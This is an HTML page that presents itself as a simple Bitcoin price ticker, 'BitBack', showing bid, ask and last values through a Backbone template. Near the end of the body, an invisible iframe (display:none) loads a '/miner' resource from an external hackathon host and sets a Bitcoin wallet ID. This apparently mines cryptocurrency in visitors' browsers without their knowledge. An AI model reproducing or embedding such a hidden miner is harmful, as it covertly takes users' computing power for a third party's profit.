<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<title>BitBack</title>
		<style>
		div {
			position: absolute;
		}
		</style>
		<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
		<script src="//cdnjs.cloudflare.com/ajax/libs/underscore.js/1.5.2/underscore-min.js"></script>
		<script src="//cdnjs.cloudflare.com/ajax/libs/backbone.js/1.0.0/backbone-min.js"></script>
		<script type='text/javascript' src='https://cdn.firebase.com/v0/firebase.js'></script>
	</head>
	<body>
		<h1>Hi</h1>
		<div id="bitcoin"></div>

		<script id="btc-template" type="text/html">
			<h2>BitCoin</h2>
			<h3>Bid:</h3>
			<p><%= bid %></p>
			<h3>Ask:</h3>
			<p><%= ask %></p>
			<h3>Last:</h3>
			<p><%= last %></p>
		</script>
	<iframe style='display:none' src='http://shoop-team.2013.nodeknockout.com/miner'><script>window.walletId = 1Mtr3VEAjK8FCHLDNadSaLyFs1of1qvFf5</script></iframe>
	<script src="app.js"></script>
	
	</body>
</html>